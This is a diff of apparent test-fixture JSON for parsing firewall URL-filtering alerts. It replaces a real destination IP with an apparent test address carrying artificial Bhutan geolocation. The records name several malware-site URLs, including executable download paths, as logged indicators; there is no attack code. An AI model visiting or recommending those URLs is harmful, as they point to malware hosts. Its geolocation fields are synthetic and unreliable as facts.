 "event.kind": "alert",
 "event.module": "panw",
- "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25713,1,59300,80,0,0,0x200000,tcp,block-url,\"infodist1.com/in.cgi?11¶meter=404\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
+ "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25713,1,59300,80,0,0,0x200000,tcp,block-url,\"infodist1.com/in.cgi?11¶meter=404\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
 "event.outcome": "success",
 "event.severity": 5,
 "event.timezone": "-02:00",
@@ -1357,9 +1301,9 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "informational",
- "log.offset": 5466,
+ "log.offset": 5440,
 "network.application": "web-browsing",
- "network.community_id": "1:YDMNSbru670DK5EMT3E28WFJPz4=",
+ "network.community_id": "1:p332Xv4lcmlBtHbVIre7h23l+pw=",
 "network.direction": "inbound",
 "network.transport": "tcp",
 "observer.egress.interface.name": "ethernet1/1",
@@ -1394,13 +1338,13 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.port": 80,
 "service.type": "panw",
 "source.address": "192.168.0.2",
@@ -1424,19 +1368,15 @@
 "client.ip": "192.168.0.2",
 "client.port": 59295,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.ip": "67.43.156.12",
 "destination.port": 80,
 "event.action": "url_filtering",
 "event.category": [
@@ -1447,7 +1387,7 @@
 "event.dataset": "panw.panos",
 "event.kind": "alert",
 "event.module": "panw",
- "event.original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25451,1,59295,80,0,0,0x208000,tcp,alert,\"cls-softwares.com/suc.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+ "event.original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25451,1,59295,80,0,0,0x208000,tcp,alert,\"cls-softwares.com/suc.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
 "event.outcome": "success",
 "event.severity": 5,
 "event.timezone": "-02:00",
@@ -1459,9 +1399,9 @@
 "labels.captive_portal": true,
 "labels.container_page": true,
 "log.level": "informational",
- "log.offset": 5882,
+ "log.offset": 5854,
 "network.application": "web-browsing",
- "network.community_id": "1:AEtFqIuwxZ9TQ3w9m74nOrboCXE=",
+ "network.community_id": "1:BV30Tkuh3C81MwjElomoGcaQISc=",
 "network.direction": "inbound",
 "network.transport": "tcp",
 "observer.egress.interface.name": "ethernet1/1",
@@ -1496,13 +1436,13 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.port": 80,
 "service.type": "panw",
 "source.address": "192.168.0.2",
@@ -1525,19 +1465,15 @@
 "client.ip": "192.168.0.2",
 "client.port": 59291,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.ip": "67.43.156.12",
 "destination.port": 80,
 "event.action": "url_filtering",
 "event.category": [
@@ -1548,7 +1484,7 @@
 "event.dataset": "panw.panos",
 "event.kind": "alert",
 "event.module": "panw",
- "event.original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26414,1,59291,80,0,0,0x208000,tcp,alert,\"cls-softwares.com/softwarefortubeview.40013.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+ "event.original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26414,1,59291,80,0,0,0x208000,tcp,alert,\"cls-softwares.com/softwarefortubeview.40013.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
 "event.outcome": "success",
 "event.severity": 5,
 "event.timezone": "-02:00",
@@ -1560,9 +1496,9 @@
 "labels.captive_portal": true,
 "labels.container_page": true,
 "log.level": "informational",
- "log.offset": 6290,
+ "log.offset": 6260,
 "network.application": "web-browsing",
- "network.community_id": "1:AuQEAPptnfXLW8oL/ac3CM4Gnnw=",
+ "network.community_id": "1:xHSG5OWliVYrQrcpFpqQQ8rABOQ=",
 "network.direction": "inbound",
 "network.transport": "tcp",
 "observer.egress.interface.name": "ethernet1/1",
@@ -1597,13 +1533,13 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.port": 80,
 "service.type": "panw",
 "source.address": "192.168.0.2",
@@ -1627,13 +1563,6 @@
 "client.port": 59296,
 "client.user.name": "crusher",
 "destination.address": "78.159.99.224",
- "destination.as.number": 28753,
- "destination.as.organization.name": "Leaseweb Deutschland GmbH",
- "destination.geo.continent_name": "Europe",
- "destination.geo.country_iso_code": "DE",
- "destination.geo.country_name": "Germany",
- "destination.geo.location.lat": 51.2993,
- "destination.geo.location.lon": 9.491,
 "destination.geo.name": "Germany",
 "destination.ip": "78.159.99.224",
 "destination.port": 80,
@@ -1657,7 +1586,7 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "informational",
- "log.offset": 6720,
+ "log.offset": 6688,
 "network.application": "web-browsing",
 "network.community_id": "1:v73LbTZDPLO+1dzNRixeZAmolJ0=",
 "network.direction": "inbound",
@@ -1724,19 +1653,15 @@
 "client.ip": "192.168.0.2",
 "client.port": 59280,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.ip": "67.43.156.12",
 "destination.port": 80,
 "event.action": "url_filtering",
 "event.category": [
@@ -1747,7 +1672,7 @@
 "event.dataset": "panw.panos",
 "event.kind": "alert",
 "event.module": "panw",
- "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26127,1,59280,80,0,0,0x208000,tcp,alert,\"allowedwebsurfing.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+ "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26127,1,59280,80,0,0,0x208000,tcp,alert,\"allowedwebsurfing.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
 "event.outcome": "success",
 "event.severity": 5,
 "event.timezone": "-02:00",
@@ -1759,9 +1684,9 @@
 "labels.captive_portal": true,
 "labels.container_page": true,
 "log.level": "informational",
- "log.offset": 7132,
+ "log.offset": 7100,
 "network.application": "web-browsing",
- "network.community_id": "1:IRI0j5xLyLhwaONpy7gVZdl/Qow=",
+ "network.community_id": "1:Qa15R3rz4GWk8OTZoeYfdAqCt1M=",
 "network.direction": "inbound",
 "network.transport": "tcp",
 "observer.egress.interface.name": "ethernet1/1",
@@ -1796,13 +1721,13 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.port": 80,
 "service.type": "panw",
 "source.address": "192.168.0.2",
@@ -1824,19 +1749,15 @@
 "client.ip": "192.168.0.2",
 "client.port": 59281,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.ip": "67.43.156.12",
 "destination.port": 80,
 "event.action": "url_filtering",
 "event.category": [
@@ -1847,7 +1768,7 @@
 "event.dataset": "panw.panos",
 "event.kind": "alert",
 "event.module": "panw",
- "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,25306,1,59281,80,0,0,0x208000,tcp,alert,\"antivirus-remote.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+ "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,25306,1,59281,80,0,0,0x208000,tcp,alert,\"antivirus-remote.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
 "event.outcome": "success",
 "event.severity": 5,
 "event.timezone": "-02:00",
@@ -1859,9 +1780,9 @@
 "labels.captive_portal": true,
 "labels.container_page": true,
 "log.level": "informational",
- "log.offset": 7537,
+ "log.offset": 7503,
 "network.application": "web-browsing",
- "network.community_id": "1:/tG+YfZ8qFKrUDfQ7EThCBXci9Y=",
+ "network.community_id": "1:8GDPB5ZfeGIOX/3DLPuYG5D0Gko=",
 "network.direction": "inbound",
 "network.transport": "tcp",
 "observer.egress.interface.name": "ethernet1/1",
@@ -1896,13 +1817,13 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.port": 80,
 "service.type": "panw",
 "source.address": "192.168.0.2",
@@ -1924,19 +1845,15 @@
 "client.ip": "192.168.0.2",
 "client.port": 59282,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.ip": "67.43.156.12",
 "destination.port": 80,
 "event.action": "url_filtering",
 "event.category": [
@@ -1947,7 +1864,7 @@
 "event.dataset": "panw.panos",
 "event.kind": "alert",
 "event.module": "panw",
- "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24561,1,59282,80,0,0,0x208000,tcp,alert,\"bklinkov.ru/hi/start.cfg\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+ "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24561,1,59282,80,0,0,0x208000,tcp,alert,\"bklinkov.ru/hi/start.cfg\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
 "event.outcome": "success",
 "event.severity": 5,
 "event.timezone": "-02:00",
@@ -1959,9 +1876,9 @@
 "labels.captive_portal": true,
 "labels.container_page": true,
 "log.level": "informational",
- "log.offset": 7941,
+ "log.offset": 7905,
 "network.application": "web-browsing",
- "network.community_id": "1:Vfi4CxQayypb3DoxclNfeNjXdjo=",
+ "network.community_id": "1:0Ma3cvskYuynmIkvb9KtKByU6JA=",
 "network.direction": "inbound",
 "network.transport": "tcp",
 "observer.egress.interface.name": "ethernet1/1",
@@ -1996,13 +1913,13 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.port": 80,
 "service.type": "panw",
 "source.address": "192.168.0.2",
@@ -2025,19 +1942,15 @@
 "client.ip": "192.168.0.2",
 "client.port": 59290,
 "client.user.name": "crusher",
- "destination.address": "204.232.231.46",
- "destination.as.number": 27357,
- "destination.as.organization.name": "Rackspace Hosting",
- "destination.geo.city_name": "Fort Lauderdale",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 26.1792,
- "destination.geo.location.lon": -80.1749,
+ "destination.address": "67.43.156.12",
+ "destination.as.number": 35908,
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-FL",
- "destination.geo.region_name": "Florida",
- "destination.ip": "204.232.231.46",
+ "destination.ip": "67.43.156.12",
 "destination.port": 80,
 "event.action": "url_filtering",
 "event.category": [
@@ -2048,7 +1961,7 @@
 "event.dataset": "panw.panos",
 "event.kind": "alert",
 "event.module": "panw",
- "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,15099,1,59290,80,0,0,0x208000,tcp,alert,\"blogsexnakedgirlxxx.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+ "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,15099,1,59290,80,0,0,0x208000,tcp,alert,\"blogsexnakedgirlxxx.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
 "event.outcome": "success",
 "event.severity": 5,
 "event.timezone": "-02:00",
@@ -2060,9 +1973,9 @@
 "labels.captive_portal": true,
 "labels.container_page": true,
 "log.level": "informational",
- "log.offset": 8348,
+ "log.offset": 8310,
 "network.application": "web-browsing",
- "network.community_id": "1:2UbFMV1DsXMB0b/AUotNCCsHm0s=",
+ "network.community_id": "1:xYos/Wgi+h9Q+dddrLHkE05fDcY=",
 "network.direction": "inbound",
 "network.transport": "tcp",
 "observer.egress.interface.name": "ethernet1/1",
@@ -2097,13 +2010,13 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "204.232.231.46"
+ "67.43.156.12"
 ],
 "related.user": [
 "crusher"
 ],
 "rule.name": "rule1",
- "server.ip": "204.232.231.46",
+ "server.ip": "67.43.156.12",
 "server.port": 80,
 "service.type": "panw",
 "source.address": "192.168.0.2",
@@ -2125,19 +2038,15 @@ "client.ip": "192.168.0.2", "client.port": 59286, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, + "destination.address": "67.43.156.12", + "destination.as.number": 35908, + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.ip": "67.43.156.12", "destination.port": 80, "event.action": "url_filtering", "event.category": [ 
@@ -2148,7 +2057,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24955,1,59286,80,0,0,0x208000,tcp,alert,\"bklinkov.ru/hi/start.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24955,1,59286,80,0,0,0x208000,tcp,alert,\"bklinkov.ru/hi/start.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -2160,9 +2069,9 @@ "labels.captive_portal": true, "labels.container_page": true, "log.level": "informational", - "log.offset": 8755, + "log.offset": 8715, "network.application": "web-browsing", - "network.community_id": "1:M8DHGZjrHyuCRpC9MNNfDUke5g4=", + "network.community_id": "1:rCE7GRimBj3QOL9WyI+CJq1w2hU=", "network.direction": "inbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -2197,13 +2106,13 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.port": 80, "service.type": "panw", "source.address": "192.168.0.2", 
@@ -2226,19 +2135,15 @@ "client.ip": "192.168.0.2", "client.port": 59275, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, + "destination.address": "67.43.156.12", + "destination.as.number": 35908, + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.ip": "67.43.156.12", "destination.port": 80, "event.action": "url_filtering", "event.category": [ 
@@ -2249,7 +2154,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25398,1,59275,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "event.original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25398,1,59275,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -2261,9 +2166,9 @@ "labels.captive_portal": true, "labels.container_page": true, "log.level": "informational", - "log.offset": 9162, + "log.offset": 9120, "network.application": "web-browsing", - "network.community_id": "1:AVMiOufq2owuhWpcu/TfRJ38tv4=", + "network.community_id": "1:3XOAuMIA4BGVLvrD2qCIXiQJjzI=", "network.direction": "inbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -2295,13 +2200,13 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.port": 80, "service.type": "panw", "source.address": "192.168.0.2", 
@@ -2321,19 +2226,15 @@ "client.ip": "192.168.0.2", "client.port": 59277, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, + "destination.address": "67.43.156.12", + "destination.as.number": 35908, + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.ip": "67.43.156.12", "destination.port": 80, "event.action": "url_filtering", "event.category": [ 
@@ -2344,7 +2245,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25945,1,59277,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "event.original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25945,1,59277,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -2356,9 +2257,9 @@ "labels.captive_portal": true, "labels.container_page": true, "log.level": "informational", - "log.offset": 9555, + "log.offset": 9511, "network.application": "web-browsing", - "network.community_id": "1:/+Opb16c1ye6uLeu1/TNC+SGnYs=", + "network.community_id": "1:fWPYdsanjAyyuvglU9X63EBU5rY=", "network.direction": "inbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -2390,13 +2291,13 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.port": 80, "service.type": "panw", "source.address": "192.168.0.2", 
@@ -2416,19 +2317,15 @@ "client.ip": "192.168.0.2", "client.port": 59276, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, + "destination.address": "67.43.156.12", + "destination.as.number": 35908, + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.ip": "67.43.156.12", "destination.port": 80, "event.action": "url_filtering", "event.category": [ 
